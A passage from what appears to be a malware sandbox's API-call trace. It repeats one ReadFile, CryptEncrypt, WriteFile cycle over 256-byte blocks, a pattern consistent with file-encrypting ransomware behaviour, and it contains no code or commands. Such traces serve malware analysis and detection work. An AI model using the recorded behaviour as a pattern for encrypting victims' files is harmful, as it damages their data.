lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.413] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.413] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.413] GetLastError () returned 0x0 [0144.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.413] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.413] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.413] GetLastError () returned 0x0 [0144.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.413] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.413] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.413] GetLastError () returned 0x0 [0144.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.413] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.413] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.413] GetLastError () returned 0x0 [0144.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.413] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.413] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.413] GetLastError () returned 0x0 [0144.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.413] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.413] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.413] GetLastError () returned 0x0 [0144.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.413] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.414] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.414] GetLastError () returned 0x0 [0144.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.414] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.414] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.414] GetLastError () returned 0x0 [0144.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.414] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.414] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.414] GetLastError () returned 0x0 [0144.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.414] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.414] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.414] GetLastError () returned 0x0 [0144.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.414] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.414] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.414] GetLastError () returned 0x0 [0144.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.414] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.414] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.414] GetLastError () returned 0x0 [0144.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.414] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.414] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.414] GetLastError () returned 0x0 [0144.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.415] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.415] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.415] GetLastError () returned 0x0 [0144.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.415] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.415] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.415] GetLastError () returned 0x0 [0144.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.415] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.415] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.415] GetLastError () returned 0x0 [0144.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.415] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.415] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.415] GetLastError () returned 0x0 [0144.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.415] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.415] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.415] GetLastError () returned 0x0 [0144.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.415] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.415] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.415] GetLastError () returned 0x0 [0144.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.415] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.416] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.416] GetLastError () returned 0x0 [0144.416] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.416] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.416] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.416] GetLastError () returned 0x0 [0144.416] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.416] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.416] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.416] GetLastError () returned 0x0 [0144.416] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.416] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.416] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.416] GetLastError () returned 0x0 [0144.416] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.416] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.416] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.416] GetLastError () returned 0x0 [0144.416] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.416] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.416] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.416] GetLastError () returned 0x0 [0144.416] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.416] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.416] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.416] GetLastError () returned 0x0 [0144.416] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.417] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.417] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.417] GetLastError () returned 0x0 [0144.417] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.417] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.417] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.417] GetLastError () returned 0x0 [0144.417] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.417] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.417] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.417] GetLastError () returned 0x0 [0144.417] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.417] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.417] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.417] GetLastError () returned 0x0 [0144.417] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.417] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.417] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.417] GetLastError () returned 0x0 [0144.417] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.417] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.417] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.417] GetLastError () returned 0x0 [0144.417] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.417] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, 